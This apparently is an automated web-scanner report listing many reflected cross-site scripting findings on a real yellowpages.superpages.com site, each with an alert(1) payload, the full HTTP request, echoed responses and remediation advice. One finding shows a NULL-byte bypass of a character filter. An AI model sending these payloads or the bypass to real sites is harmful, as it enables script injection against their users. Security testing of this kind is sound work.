GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 03 Feb 2011 17:10:53 GMT Connection: close
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57369 Date: Thu, 03 Feb 2011 17:10:47 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.98. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/listings.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56970 Date: Thu, 03 Feb 2011 17:10:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ges.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
